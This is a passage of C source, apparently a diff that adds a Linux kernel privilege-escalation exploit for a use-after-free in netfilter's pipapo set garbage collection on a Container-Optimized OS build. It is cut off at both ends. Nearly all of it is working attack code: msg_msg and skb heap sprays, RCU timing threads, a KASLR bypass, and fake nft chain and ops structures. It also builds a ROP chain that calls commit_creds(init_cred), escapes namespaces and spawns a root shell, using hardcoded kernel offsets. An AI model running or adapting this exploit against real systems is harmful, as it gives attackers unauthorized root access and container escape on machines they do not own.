Padding batch at %d failed: %d\n", sent, r); return r; } + sent += chunk; + if (sent % 10000 == 0 || sent >= count) + printf("[+] Padding: %d/%d\n", sent, count); + } + return 0; +} + +static int add_target(int fd, char *buf) { + uint8_t key[32]; + int off = 0; batch_begin(buf, &off); + int h = off; + msg_hdr(buf, &off, NFT_MSG_NEWSETELEM, NLM_F_CREATE|NLM_F_ACK, NFPROTO_INET); + nla_put_str(buf, &off, NFTA_SET_ELEM_LIST_TABLE, "t"); + nla_put_str(buf, &off, NFTA_SET_ELEM_LIST_SET, "s"); + int els = nest_start(buf, &off, NFTA_SET_ELEM_LIST_ELEMENTS); + int el = nest_start(buf, &off, 1); + /* Key: (::1, ::1) */ + int k = nest_start(buf, &off, NFTA_SET_ELEM_KEY); + build_target_key(key); + nla_put(buf, &off, NFTA_DATA_VALUE, key, 32); + nest_end(buf, &off, k); + /* Key end: same (point range) */ + int ke = nest_start(buf, &off, NFTA_SET_ELEM_KEY_END); + nla_put(buf, &off, NFTA_DATA_VALUE, key, 32); + nest_end(buf, &off, ke); + /* Data: recognizable pattern */ + { int dt = nest_start(buf, &off, NFTA_SET_ELEM_DATA); + uint64_t dval = 0xAAAAAAAAAAAAAAAAULL; + nla_put(buf, &off, NFTA_DATA_VALUE, &dval, 8); + nest_end(buf, &off, dt); } + /* Short timeout: 2 seconds */ + nla_put_u64(buf, &off, NFTA_SET_ELEM_TIMEOUT, 2000ULL); + /* USERDATA: pushes target to kmalloc-cg-512 (separate from fillers in -128). + * 512-byte aligned: byte 0 (genmask)=0, byte 8 (EXPRESSIONS)=0 → no crash. 
+ * offset[EXPIRATION]=0xFF → ext+255 stays WITHIN 512B object → mtext → not expired */ + { uint8_t udata[TARGET_UDATA_LEN]; + memset(udata, 0xCC, TARGET_UDATA_LEN); + nla_put(buf, &off, NFTA_SET_ELEM_USERDATA, udata, TARGET_UDATA_LEN); + } + nest_end(buf, &off, el); + nest_end(buf, &off, els); + msg_end(buf, h, &off); batch_end(buf, &off); + return nl_do(fd, buf, off); +} + + +static uint64_t now_us(void) { + struct timespec ts; + clock_gettime(CLOCK_MONOTONIC, &ts); + return (uint64_t)ts.tv_sec * 1000000ULL + ts.tv_nsec / 1000; +} + +/* Commit thread — runs nft_commit on CPU 0 so call_rcu(kfree) enqueues on CPU 0. + * The main thread on CPU 0 sprays concurrently via msgsnd syscalls. + * During vmalloc's cond_resched, the scheduler switches between them. */ +struct commit_ctx { + volatile int go; + volatile int done; + volatile int result; + volatile uint64_t t_start; + volatile uint64_t t_done; + int fd; + int idx; + int use_verdict_set; /* If nonzero, add dummy to set "v" (verdict map) */ +}; + +static void *commit_fn(void *arg) { + struct commit_ctx *ctx = (struct commit_ctx *)arg; + /* Build commit message in thread-local buffer */ + char *cbuf = (char *)malloc(4096); + if (!cbuf) { ctx->result = -ENOMEM; ctx->done = 1; return NULL; } + + uint8_t key[32]; + int off = 0; + batch_begin(cbuf, &off); + int h = off; + msg_hdr(cbuf, &off, NFT_MSG_NEWSETELEM, NLM_F_CREATE|NLM_F_ACK, NFPROTO_INET); + nla_put_str(cbuf, &off, NFTA_SET_ELEM_LIST_TABLE, "t"); + nla_put_str(cbuf, &off, NFTA_SET_ELEM_LIST_SET, + ctx->use_verdict_set ? 
"v" : "s"); + int els = nest_start(cbuf, &off, NFTA_SET_ELEM_LIST_ELEMENTS); + int el = nest_start(cbuf, &off, 1); + memset(key, 0, 32); + key[0] = 0xfc; key[13] = (ctx->idx >> 8) & 0xFF; key[14] = ctx->idx & 0xFF; + memcpy(key + 16, key, 16); + int k = nest_start(cbuf, &off, NFTA_SET_ELEM_KEY); + nla_put(cbuf, &off, NFTA_DATA_VALUE, key, 32); + nest_end(cbuf, &off, k); + int ke = nest_start(cbuf, &off, NFTA_SET_ELEM_KEY_END); + nla_put(cbuf, &off, NFTA_DATA_VALUE, key, 32); + nest_end(cbuf, &off, ke); + if (ctx->use_verdict_set) { + /* Verdict data: NFT_CONTINUE */ + int dt = nest_start(cbuf, &off, NFTA_SET_ELEM_DATA); + int vd = nest_start(cbuf, &off, 2 /* NFTA_DATA_VERDICT */); + nla_put_u32(cbuf, &off, 1 /* NFTA_VERDICT_CODE */, 0xFFFFFFFF); + nest_end(cbuf, &off, vd); + nest_end(cbuf, &off, dt); + } else { + int dt = nest_start(cbuf, &off, NFTA_SET_ELEM_DATA); + uint64_t dval = 0; nla_put(cbuf, &off, NFTA_DATA_VALUE, &dval, 8); + nest_end(cbuf, &off, dt); + } + nla_put_u64(cbuf, &off, NFTA_SET_ELEM_TIMEOUT, 3600000ULL); + nest_end(cbuf, &off, el); + nest_end(cbuf, &off, els); + msg_end(cbuf, h, &off); + batch_end(cbuf, &off); + + while (!ctx->go) + sched_yield(); /* yield instead of tight spin */ + + ctx->t_start = now_us(); + ctx->result = nl_do(ctx->fd, cbuf, off); + ctx->t_done = now_us(); + ctx->done = 1; + free(cbuf); + return NULL; +} + +/* GP forcer thread — calls MEMBARRIER_CMD_GLOBAL (= synchronize_rcu) on CPU 1 + * to force RCU grace period completion. After synchronize_rcu returns, the GP + * has completed, and kfree callbacks on CPU 0 are eligible to fire (they fire + * at the next softirq/timer tick on CPU 0, within ~1ms with HZ=1000). 
*/ +struct gp_ctx { + volatile int go; + volatile int stop; + volatile int done; + volatile int count; + volatile uint64_t t_start; + volatile uint64_t t_done; +}; + +static void *gp_forcer_fn(void *arg) { + struct gp_ctx *ctx = (struct gp_ctx *)arg; + while (!ctx->go && !ctx->stop) + ; + + ctx->t_start = now_us(); + /* MEMBARRIER_CMD_GLOBAL calls synchronize_rcu() — waits for a full GP. + * This forces the GP started by pipapo_gc's call_rcu to complete. */ + int r = syscall(__NR_membarrier, MEMBARRIER_CMD_GLOBAL, 0, -1); + ctx->t_done = now_us(); + ctx->count = 1; + + /* Keep calling to ensure any late GPs also complete */ + while (!ctx->stop) { + r = syscall(__NR_membarrier, MEMBARRIER_CMD_GLOBAL, 0, -1); + ctx->count++; + if (r < 0) break; + } + ctx->done = 1; + return NULL; +} + +/* Flood thread — sends IPv6 UDP packets to ::1 triggering pipapo lookups */ +struct flood_ctx { + volatile int stop; + volatile long sent; + volatile long recv_ok; + volatile long hit; + volatile long miss; + volatile long changed; + uint64_t changed_vals[256]; + volatile int n_unique_vals; + /* Debug: record raw recv values during commit window, time-gated */ + uint64_t raw_vals[4096]; + uint64_t raw_ts[4096]; /* timestamps relative to commit start */ + volatile int n_raw; + /* Time-bucketed counters (each 2ms bucket from 0-20ms) */ + volatile long bucket_miss[10]; + volatile long bucket_changed[10]; + volatile long bucket_hit[10]; + volatile int recording; + volatile uint64_t t_base; /* commit start time for relative timestamps */ + volatile uint64_t record_after_us; /* only record after this many us from t_base */ +}; + +static void *flood_fn(void *arg) { + struct flood_ctx *ctx = (struct flood_ctx *)arg; + + int sfd = socket(AF_INET6, SOCK_DGRAM, 0); + int rfd = socket(AF_INET6, SOCK_DGRAM, 0); + if (sfd < 0 || rfd < 0) { perror("flood socket"); return NULL; } + + /* Bind receiver to port 9999 on ::1 */ + struct sockaddr_in6 raddr = { + .sin6_family = AF_INET6, + .sin6_port = 
htons(9999), + .sin6_addr = IN6ADDR_LOOPBACK_INIT, + }; + if (bind(rfd, (struct sockaddr *)&raddr, sizeof(raddr)) < 0) { + perror("flood bind"); + close(sfd); close(rfd); return NULL; + } + struct timeval tv = { .tv_sec = 0, .tv_usec = 1000 }; + setsockopt(rfd, SOL_SOCKET, SO_RCVTIMEO, &tv, sizeof(tv)); + + /* Bind sender to ::1 explicitly */ + struct sockaddr_in6 saddr = { + .sin6_family = AF_INET6, + .sin6_addr = IN6ADDR_LOOPBACK_INIT, + }; + bind(sfd, (struct sockaddr *)&saddr, sizeof(saddr)); + + struct sockaddr_in6 dst = { + .sin6_family = AF_INET6, + .sin6_port = htons(9999), + .sin6_addr = IN6ADDR_LOOPBACK_INIT, + }; + + char pkt[32], rbuf[64]; + memset(pkt, 0xBB, sizeof(pkt)); + + while (!ctx->stop) { + int sr = sendto(sfd, pkt, sizeof(pkt), MSG_DONTWAIT, (struct sockaddr *)&dst, sizeof(dst)); + if (sr > 0) ctx->sent++; + /* Yield every 8 sends to report RCU quiescent state on CPU 1 */ + if ((ctx->sent & 7) == 0) + sched_yield(); + + for (int drain = 0; drain < 8; drain++) { + int n = recv(rfd, rbuf, sizeof(rbuf), MSG_DONTWAIT); + if (n < 0) break; + ctx->recv_ok++; + if (n >= 8) { + uint64_t val; + memcpy(&val, rbuf, 8); + /* Record raw values during commit window (time-gated) */ + if (ctx->recording) { + uint64_t elapsed = now_us() - ctx->t_base; + if (elapsed >= ctx->record_after_us && ctx->n_raw < 4096) { + int idx = ctx->n_raw; + ctx->raw_vals[idx] = val; + ctx->raw_ts[idx] = elapsed; + ctx->n_raw++; + } + /* Update time-bucketed counters (2ms buckets, 0-20ms) */ + int bucket = (int)(elapsed / 2000); + if (bucket >= 0 && bucket < 10) { + if (val == 0xBBBBBBBBBBBBBBBBULL) + ctx->bucket_miss[bucket]++; + else if (val == 0xAAAAAAAAAAAAAAAAULL) + ctx->bucket_hit[bucket]++; + else + ctx->bucket_changed[bucket]++; + } + } + if (val == 0xBBBBBBBBBBBBBBBBULL) + ctx->miss++; + else if (val == 0xAAAAAAAAAAAAAAAAULL) + ctx->hit++; + else if (val == 0) + ctx->changed++; /* zero = our fill, count but don't record */ + else { + ctx->changed++; + if 
(ctx->n_unique_vals < 256) { + int dup = 0; + for (int j = 0; j < ctx->n_unique_vals; j++) + if (ctx->changed_vals[j] == val) { dup = 1; break; } + if (!dup) + ctx->changed_vals[ctx->n_unique_vals++] = val; + } + } + } + } + } + close(sfd); close(rfd); + return NULL; +} + + +/* CPU 1 spray thread — catches kfree from GC workqueue running on CPU 1. + * Without this, only kfree on CPU 0 is reclaimable (spray on CPU 0). + * GC workqueue runs on random CPU, so ~50% of kfrees go to CPU 1. */ +struct spray1_ctx { + volatile int go; + volatile int stop; + volatile int go_phase2; /* Set when commit starts — gates phase 2 */ + volatile long count; + volatile int phase; /* 1 = filling main, 2 = waiting, 3 = filling reclaim */ + int *qids; + int n_queues; + int *reclaim_qids; /* Extra queues for pure allocation (no drain) */ + int n_reclaim; +}; + +static void *spray1_fn(void *arg) { + struct spray1_ctx *ctx = (struct spray1_ctx *)arg; + struct { long mtype; char mtext[SPRAY_MSG_DSIZE]; } spray_msg; + spray_msg.mtype = 0x42; + for (int i = 0; i < SPRAY_MSG_DSIZE; i++) + spray_msg.mtext[i] = 0x41 + i; + + while (!ctx->go && !ctx->stop) + ; + + /* Phase 1: Fast fill — exhaust existing slab pages. + * This puts ~200 msgs per queue × 1024 queues = ~204K allocations. + * After this, per-cpu freelist is empty. */ + ctx->phase = 1; + int qi = 0; + int phase1_sent = 0; + while (!ctx->stop) { + if (msgsnd(ctx->qids[qi], &spray_msg, SPRAY_MSG_DSIZE, IPC_NOWAIT) == 0) { + ctx->count++; + phase1_sent++; + } + qi = (qi + 1) % ctx->n_queues; + if (qi == 0) { + if (phase1_sent == 0) + break; /* All queues full */ + phase1_sent = 0; + sched_yield(); + } + } + + ctx->phase = 2; + /* Phase 2: Wait for commit to start. Phase 1 saturated SLUB cache. + * We must NOT allocate yet — if we fill reclaim queues now, there's + * no allocation capacity during the vmalloc window. 
*/ + while (!ctx->go_phase2 && !ctx->stop) + ; + + ctx->phase = 3; + /* Phase 3: Pure allocation into reclaim queues (NO drain/free). + * Commit is running pipapo_gc → call_rcu(kfree) → vmalloc. + * When kfree fires, target page becomes ONLY partial on CPU 0. + * These allocs exhaust c->slab leftovers then pick the freed page. + * CRITICAL: no drain/free here = no SLUB freelist pollution. */ + qi = 0; + while (!ctx->stop && ctx->reclaim_qids) { + if (msgsnd(ctx->reclaim_qids[qi], &spray_msg, SPRAY_MSG_DSIZE, IPC_NOWAIT) == 0) + ctx->count++; + qi = (qi + 1) % ctx->n_reclaim; + } + return NULL; +} + +/* ====== Phase 3: Code execution via nft_immediate OOB dreg ====== */ + +/* Kernel symbol offsets: resolved at runtime via kernelXDK target DB. + * Fallback hardcoded values for cos-121-18867.381.30 used when DB unavailable. */ +#define OFF_NFT_IMMEDIATE_EVAL 0x12323d0ULL +#define OFF_COMMIT_CREDS 0x1ffbe0ULL +#define OFF_INIT_CRED 0x2e72f20ULL +#define OFF_POP_RDI_RET 0x160db4ULL +#define OFF_SWAPGS_IRETQ 0x1601949ULL +#define OFF_NFT_IMM_OPS 0x1d8d500ULL /* nft_imm_ops in .data, for kernelXDK symbol table */ + +/* Global target reference for kernelXDK, set in main() */ +static Target *g_target = nullptr; + +static uint64_t user_cs, user_ss, user_rflags, user_rsp; +static void save_state(void) { + asm volatile( + "mov %%cs, %0\n" + "mov %%ss, %1\n" + "pushfq\n" + "pop %2\n" + "mov %%rsp, %3\n" + : "=r"(user_cs), "=r"(user_ss), "=r"(user_rflags), "=r"(user_rsp) + ); +} + +static void shell(void) { + if (getuid() == 0) { + printf("[!!!] GOT ROOT!\n"); + execl("/bin/sh", "sh", NULL); + } + printf("[-] Not root (uid=%d)\n", getuid()); + exit(1); +} + +/* + * Build the fake chain mtext buffer for a msg_msg at address `base`. + * The mtext starts at base+48 (after msg_msg header). 
+ * + * Layout within mtext (464 bytes): + * [0-7]: fake chain: blob_gen_0 = base+48+16 (→ blob) + * [8-15]: fake chain: blob_gen_1 = base+48+16 (→ blob) + * [16-23]: blob header: size = 256 + * [24-31]: rule_dp: is_last=0, dlen=64 (2 exprs × 32B) → u64 = 0x80 + * [32-63]: expr1 (verdict reset): ops→fake_ops, dreg=0, dlen=4, data=NFT_CONTINUE + * [64-95]: expr2 (OOB ROP write): ops→fake_ops, dreg=54, dlen=136, data=ROP start + * [96-103]: sentinel rule_dp: is_last=1 → u64 = 1 + * [104+]: ROP chain continuation (read as part of expr2's memcpy source) + * [300-319]: fake nft_expr_ops: eval=nft_immediate_eval, select_ops=0, size=32 + */ +static void build_fake_chain_mtext(uint8_t *mtext, uint64_t base, uint64_t kbase) { + memset(mtext, 0, SPRAY_MSG_DSIZE); + + uint64_t mtext_base = base + 48; /* msg_msg header = 48 bytes */ + uint64_t blob_addr = mtext_base + 16; + /* Self-referencing fake ops within the msg_msg mtext. + * Cannot use kernel's nft_imm_ops because .rodata function pointers + * are NOT runtime-relocated on COS kernels (KASLR only shifts the + * virtual address of the section, not the pointer values within). */ + uint64_t ops_addr = mtext_base + 300; + uint64_t nft_immediate_eval_addr = kbase + OFF_NFT_IMMEDIATE_EVAL; + + /* [0-15]: fake nft_chain (first two fields) */ + *(uint64_t *)&mtext[0] = blob_addr; /* blob_gen_0 */ + *(uint64_t *)&mtext[8] = blob_addr; /* blob_gen_1 */ + + /* [16-23]: fake nft_rule_blob header */ + *(uint64_t *)&mtext[16] = 256; /* size (arbitrary, just needs to be >= rule data) */ + + /* [24-31]: rule_dp header: is_last=0, dlen=64 (two 32-byte expressions) + * Bitfield: bit0=is_last, bits1-12=dlen. 
u64 = (dlen << 1) | is_last = (64<<1)|0 = 128 */ + *(uint64_t *)&mtext[24] = 128; + + /* [32-63]: expr1 — verdict reset to NFT_CONTINUE + * Layout: [ops(8)] [priv.data(16)] [priv.dreg(1)] [priv.dlen(1)] [pad(6)] */ + *(uint64_t *)&mtext[32] = ops_addr; /* expr1.ops */ + *(uint32_t *)&mtext[40] = 0xFFFFFFFF; /* priv.data[0] = NFT_CONTINUE = -1 */ + /* priv.data[1..3] = 0 (already zeroed) */ + mtext[56] = 0; /* dreg = 0 (verdict register) */ + mtext[57] = 4; /* dlen = 4 (just the verdict code) */ + + /* [64-95]: expr2 — OOB dreg write (ROP chain to stack) + * Source for memcpy: starts at expr2+0x08 = mtext[72] + * Writes 136 bytes to rsp+0xf8 (saved rbx through iretq SS) */ + *(uint64_t *)&mtext[64] = ops_addr; /* expr2.ops */ + /* expr2 priv.data starts at mtext[72] — this IS the ROP source. + * The first 16 bytes of source = priv.data[0-15] = mtext[72-87] + * = saved rbx (8B) + saved rbp (8B) */ + *(uint64_t *)&mtext[72] = 0; /* saved rbx (don't care) */ + *(uint64_t *)&mtext[80] = 0; /* saved rbp (don't care) */ + /* priv.dreg and priv.dlen at mtext[88-89] — part of saved r12 */ + mtext[88] = 54; /* dreg = 54 → writes to rsp+0xf8 */ + mtext[89] = 136; /* dlen = 136 bytes */ + /* mtext[90-95] = padding, becomes upper bytes of saved r12 */ + /* These 6 bytes are part of saved r12 — don't care about the value */ + + /* [96-103]: sentinel rule_dp (is_last=1) — also saved r13 in ROP chain */ + *(uint64_t *)&mtext[96] = 1; /* is_last=1 */ + + /* ROP chain continuation: source bytes 32+ (mtext[104+]) */ + /* Source byte mapping: + * 0-7: mtext[72-79] = saved rbx (0) + * 8-15: mtext[80-87] = saved rbp (0) + * 16-17: mtext[88-89] = dreg/dlen (part of saved r12, low bytes) + * 18-23: mtext[90-95] = pad (rest of saved r12) + * 24-31: mtext[96-103] = sentinel (saved r13 = 1) + * 32-39: mtext[104-111] = saved r14 + * 40-47: mtext[112-119] = saved r15 + * 48-55: mtext[120-127] = return addr (pop_rdi; ret) + * 56-63: mtext[128-135] = init_cred + * 64-71: mtext[136-143] = 
commit_creds + * 72-79: mtext[144-151] = swapgs_iretq entry + * 80-87: mtext[152-159] = 0 (pop rax) + * 88-95: mtext[160-167] = 0 (pop rdi) + * 96-103: mtext[168-175] = user_rip (shell) + * 104-111: mtext[176-183] = user_cs + * 112-119: mtext[184-191] = user_rflags + * 120-127: mtext[192-199] = user_rsp + * 128-135: mtext[200-207] = user_ss + */ + *(uint64_t *)&mtext[104] = 0; /* saved r14 */ + *(uint64_t *)&mtext[112] = 0; /* saved r15 */ + + /* @step(name="rop_chain") Build ROP chain using kernelXDK if available */ + bool use_manual = true; + if (g_target) { + try { + RopChain rop(*g_target, kbase); + rop.AddRopAction(RopActionId::COMMIT_INIT_TASK_CREDS); + rop.AddRopAction(RopActionId::SWITCH_TASK_NAMESPACES, {1}); + rop.AddRopAction(RopActionId::KPTI_TRAMPOLINE, {(uint64_t)shell}); + auto rop_data = rop.GetData(); + memcpy(&mtext[120], rop_data.data(), + rop_data.size() < 344 ? rop_data.size() : 344); + use_manual = false; + } catch (...) { + printf("[*] kernelXDK RopChain failed, using manual chain\n"); + } + } + if (use_manual) { + /* Fallback: manual ROP chain with hardcoded offsets */ + *(uint64_t *)&mtext[120] = kbase + OFF_POP_RDI_RET; + *(uint64_t *)&mtext[128] = kbase + OFF_INIT_CRED; + *(uint64_t *)&mtext[136] = kbase + OFF_COMMIT_CREDS; + *(uint64_t *)&mtext[144] = kbase + OFF_SWAPGS_IRETQ; + *(uint64_t *)&mtext[152] = 0; + *(uint64_t *)&mtext[160] = 0; + *(uint64_t *)&mtext[168] = (uint64_t)shell; + *(uint64_t *)&mtext[176] = user_cs; + *(uint64_t *)&mtext[184] = user_rflags; + *(uint64_t *)&mtext[192] = user_rsp; + *(uint64_t *)&mtext[200] = user_ss; + } + + /* [300-319]: fake nft_expr_ops (self-referencing within msg_msg mtext) */ + *(uint64_t *)&mtext[300] = nft_immediate_eval_addr; /* ops->eval */ + *(uint64_t *)&mtext[308] = 0; /* ops->select_ops = NULL */ + *(uint32_t *)&mtext[316] = 32; /* ops->size = 0x20 */ +} + +/* + * Build skb payload for Phase 3 reclaim of verdict map element. 
+ * Controls ext header offsets so pipapo_lookup returns our fake verdict. + * The verdict points to the fake chain in a msg_msg at chain_addr. + */ +static void build_skb_payload(uint8_t *payload, int payload_len, uint64_t chain_addr) { + memset(payload, 0, payload_len); + + payload[0] = 0; /* genmask = 0 → active */ + payload[3] = 16; /* offset[DATA] = 16 → verdict at byte 16 */ + payload[6] = 160; /* offset[EXPIRATION] = 160 */ + payload[8] = 0; /* offset[EXPRESSIONS] = 0 */ + + /* Verdict at offset 16: NFT_GOTO to fake chain */ + *(uint32_t *)&payload[16] = 0xFFFFFFFC; /* NFT_GOTO = -4 */ + *(uint32_t *)&payload[20] = 0; + *(uint64_t *)&payload[24] = chain_addr; + + /* Expiration at offset 160: far future */ + *(uint64_t *)&payload[160] = 0x7FFFFFFFFFFFFFFFULL; +} + +/* SKB spray via AF_UNIX SOCK_DGRAM socketpairs. + * The skb data area (kmalloc-cg-512) contains our controlled payload at byte 0: + * the fake ext header + verdict. Max payload: 192 bytes (512 - 320 skb_shared_info). + * The fake chain + ROP data lives in a separate msg_msg at the heap_leak address. 
*/ +#define SKB_SPRAY_PAYLOAD 192 +#define SKB_SPRAY_COUNT 128 + +static int skb_spray_fds[SKB_SPRAY_COUNT][2]; /* socketpairs */ + +static int skb_spray_init(void) { + for (int i = 0; i < SKB_SPRAY_COUNT; i++) { + if (socketpair(AF_UNIX, SOCK_DGRAM, 0, skb_spray_fds[i]) < 0) { + perror("skb socketpair"); + return -1; + } + /* Set receive buffer small to prevent kernel from dropping */ + int rcvbuf = 512; + setsockopt(skb_spray_fds[i][1], SOL_SOCKET, SO_RCVBUF, &rcvbuf, sizeof(rcvbuf)); + } + return 0; +} + +static int skb_spray_send(uint8_t *payload, int payload_len) { + int sent = 0; + for (int i = 0; i < SKB_SPRAY_COUNT; i++) { + if (write(skb_spray_fds[i][0], payload, payload_len) == payload_len) + sent++; + } + return sent; +} + +static void skb_spray_free(void) { + for (int i = 0; i < SKB_SPRAY_COUNT; i++) { + close(skb_spray_fds[i][0]); + close(skb_spray_fds[i][1]); + } +} + +int main(int argc, char **argv) { + setvbuf(stdout, NULL, _IOLBF, 0); + printf("=== pipapo GC UAF exploit (vmalloc approach) ===\n"); + + /* @step(name="vuln_trigger") --vuln-trigger: trigger vuln on KASAN build and exit */ + int vuln_trigger_only = 0; + uint64_t external_kaslr = 0; + for (int i = 1; i < argc; i++) { + if (strcmp(argv[i], "--vuln-trigger") == 0) + vuln_trigger_only = 1; + else { + char *endp; + uint64_t v = strtoull(argv[i], &endp, 16); + if (*endp == '\0') { + if (v > 0xffffffff80000000ULL) + external_kaslr = v; + else if (v == 0) + external_kaslr = 0xffffffff81000000ULL; + } + } + } + + /* Raise fd limit for spray queues + socketpairs */ + { + struct rlimit rl = { .rlim_cur = 65536, .rlim_max = 65536 }; + setrlimit(RLIMIT_NOFILE, &rl); + } + + /* @step(name="xdk_init") Initialize kernelXDK target database */ + static TargetDb kxdb("target_db.kxdb", target_db); + + try { + static auto target = kxdb.AutoDetectTarget(); + g_target = &target; + printf("[+] kernelXDK target: %s %s\n", + target.GetDistro().c_str(), target.GetReleaseName().c_str()); + } catch (...) 
{ + printf("[*] kernelXDK auto-detect failed, using hardcoded offsets\n"); + g_target = nullptr; + } + + /* Save userspace state for iretq return */ + save_state(); + printf("[+] Saved userspace state: cs=0x%lx ss=0x%lx rsp=0x%lx\n", + (unsigned long)user_cs, (unsigned long)user_ss, (unsigned long)user_rsp); + + /* @step(name="kaslr") KASLR text base via prefetch side-channel. + * Skip in --vuln-trigger mode (KASAN build, no KASLR needed). */ + uint64_t text_base = 0; + if (vuln_trigger_only) { + printf("[*] --vuln-trigger mode: skipping KASLR bypass\n"); + text_base = 0xffffffff81000000ULL; + } else if (external_kaslr) { + text_base = external_kaslr; + printf("[+] Using KASLR base from argv: 0x%016lx\n", (unsigned long)text_base); + } else { + printf("[*] Bypassing KASLR via prefetch side-channel...\n"); + text_base = bypass_kaslr(); + if (!text_base) { + printf("[-] KASLR bypass failed. Exiting (code 2).\n"); + return 2; + } + } + printf("[+] text_base = 0x%016lx\n", (unsigned long)text_base); + printf("[+] commit_creds = 0x%016lx\n", (unsigned long)(text_base + OFF_COMMIT_CREDS)); + + printf("\nFillers: %d (1hr timeout)\n", NUM_FILLERS); + printf("Target: 1 element at (::1,::1) with 2s timeout\n"); + printf("Key: 32 bytes (concat [16,16] IPv6 src+dst)\n"); + printf("Padding: %d elements (in kmalloc-cg-96, inflates vmalloc)\n", NUM_PADDING); + long total_elems = (long)NUM_FILLERS + NUM_TARGETS + NUM_PADDING; + printf("At bb=4: lt_size = 4096 * ceil(%ld/64) = %lu bytes per field\n", + total_elems, + 4096UL * ((total_elems + 63) / 64)); + printf("KMALLOC_MAX_SIZE = 4MB (MAX_ORDER=10) → vmalloc forced\n\n"); + + setup_ns(); + setup_lo(); + printf("[+] Namespace ready (IPv6 loopback)\n"); + + /* Pin to CPU 0 early — ensures all SLUB allocations (fillers, target) + * happen on CPU 0's freelist. Critical for spray reclaim: kfree in RCU + * callback on CPU 0 puts target on CPU 0's per-cpu freelist, and spray + * thread on CPU 0 can reclaim it immediately. 
*/ + { + cpu_set_t cpuset; + CPU_ZERO(&cpuset); + CPU_SET(0, &cpuset); + sched_setaffinity(0, sizeof(cpuset), &cpuset); + } + printf("[+] Main thread pinned to CPU 0\n"); + + int fd = nl_open(); + char *buf = (char *)malloc(BUF_SIZE); + if (!buf) die("malloc"); + + int rc; + int num_commits = 0; + rc = nft_table(fd, buf); if (rc) die("table: %d", rc); num_commits++; + rc = nft_chain(fd, buf); if (rc) die("chain: %d", rc); num_commits++; + rc = nft_set(fd, buf); if (rc) die("set s: %d", rc); num_commits++; + rc = nft_set_v(fd, buf); if (rc) die("set v: %d", rc); num_commits++; + rc = nft_rule(fd, buf); if (rc) die("rule s: %d", rc); num_commits++; + rc = nft_rule_v(fd, buf); if (rc) die("rule v: %d", rc); num_commits++; + printf("[+] Table/chain/sets/rules created (%d commits)\n", num_commits); + + printf("[*] Adding %d fillers to set 's' (this takes ~30s)...\n", NUM_FILLERS); + uint64_t t0 = now_us(); + if (add_fillers(fd, buf, NUM_FILLERS)) die("fillers(s) failed"); + { + int batches = (NUM_FILLERS + BATCH_CHUNK - 1) / BATCH_CHUNK; + num_commits += batches; + } + printf("[+] Fillers(s) added in %.1fs (%d commits total)\n", (now_us() - t0) / 1e6, num_commits); + + printf("[*] Adding %d fillers to set 'v' (this takes ~30s)...\n", NUM_FILLERS); + t0 = now_us(); + if (add_fillers_to(fd, buf, NUM_FILLERS, "v")) die("fillers(v) failed"); + { + int batches = (NUM_FILLERS + BATCH_CHUNK - 1) / BATCH_CHUNK; + num_commits += batches; + } + printf("[+] Fillers(v) added in %.1fs (%d commits total)\n", (now_us() - t0) / 1e6, num_commits); + + if (NUM_PADDING > 0) { + printf("[*] Adding %d padding elements (inflates vmalloc, goes to kmalloc-cg-96)...\n", NUM_PADDING); + t0 = now_us(); + if (add_padding(fd, buf, NUM_PADDING)) die("padding failed"); + { int batches = (NUM_PADDING + BATCH_CHUNK - 1) / BATCH_CHUNK; + num_commits += batches; } + printf("[+] Padding added in %.1fs (%d commits total)\n", (now_us() - t0) / 1e6, num_commits); + } + + /* Fillers (kmalloc-cg-128) and 
target (kmalloc-cg-512) are in DIFFERENT caches. + * After kfree(target) by pipapo_gc, spray msg_msgs (512B) reclaim the slot. + * msg_msg m_list.next/prev = kernel heap pointers → corrupt ext->offset[]. + * 512-byte alignment guarantees byte 0=0 (active), byte 8=0 (no expr crash). + * offset[EXPIRATION]=0xFF → ext+255 reads WITHIN same 512B msg_msg → mtext + * data → positive signed value → NOT expired → lookup proceeds! + * + * After reclaim, ext->offset[DATA] = byte 3 of m_list.next pointer. + * When byte 3 ∈ [0x00-0x0F], lookup reads from m_list.next/prev → heap leak. + * Probability ~6% per trial. We loop until we get it. + */ + + /* Flood thread on CPU 1 — has the entire CPU for fast lookups. + * Lookups dereference the shared priv->match pointer under RCU. + * CPU 0 is reserved for commit + spray (SLUB reclaim requires same CPU). + * CPU 1 has flood + GP forcer. GP forcer blocks in synchronize_rcu, + * giving flood most of CPU 1 time between GP completions. */ + struct flood_ctx fctx = {}; + pthread_t ftid; + { + pthread_attr_t attr; + pthread_attr_init(&attr); + cpu_set_t cpuset; + CPU_ZERO(&cpuset); + CPU_SET(1, &cpuset); + pthread_attr_setaffinity_np(&attr, sizeof(cpuset), &cpuset); + pthread_create(&ftid, &attr, flood_fn, &fctx); + pthread_attr_destroy(&attr); + } + usleep(200000); /* 200ms warmup */ + printf("[+] Flood running: sent=%ld recv=%ld\n", fctx.sent, fctx.recv_ok); + + /* Verify lookup works: add target, send packets, check for hits */ + { + printf("[*] Verifying lookup works...\n"); + if (add_target(fd, buf)) die("verify target failed"); + num_commits++; + usleep(100000); /* 100ms for match table update */ + long prev_hit = fctx.hit; + usleep(200000); /* 200ms to collect hits */ + long verify_hits = fctx.hit - prev_hit; + printf("[+] Verification: %ld hits in 200ms (expect >0)\n", verify_hits); + if (verify_hits == 0) { + printf("[!] WARNING: Lookup not working! Check rule/set/key.\n"); + printf("[!] 
sent=%ld recv=%ld miss=%ld hit=%ld\n", + fctx.sent, fctx.recv_ok, fctx.miss, fctx.hit); + } + /* No explicit delete of the verification target is needed: it expires + * on its own (2s timeout). We add a fresh one per cycle, so just wait. */ + sleep(3); + printf("[+] Verification target expired\n"); + } + + /* Per-cycle queues: created fresh, cleaned up on failure. + * Declared outside loop so Phase 3 can drain them after break. */ + int spray_qids[NUM_SPRAY_QUEUES]; + int reclaim_qids[NUM_RECLAIM_QUEUES]; + + uint64_t heap_leak = 0; + uint64_t text_leak = 0; + int dummy_idx = 1; + + for (int cycle = 0; cycle < MAX_CYCLES; cycle++) { + printf("\n=== CYCLE %d/%d ===\n", cycle, MAX_CYCLES); + for (int i = 0; i < NUM_SPRAY_QUEUES; i++) { + spray_qids[i] = msgget(IPC_PRIVATE, 0666); + if (spray_qids[i] < 0) + die("msgget[cycle=%d,q=%d]: %s", cycle, i, strerror(errno)); + } + for (int i = 0; i < NUM_RECLAIM_QUEUES; i++) { + reclaim_qids[i] = msgget(IPC_PRIVATE, 0666); + if (reclaim_qids[i] < 0) + die("msgget reclaim[cycle=%d,q=%d]: %s", cycle, i, strerror(errno)); + } + printf("[*] Created %d+%d queues (main+reclaim)\n", + 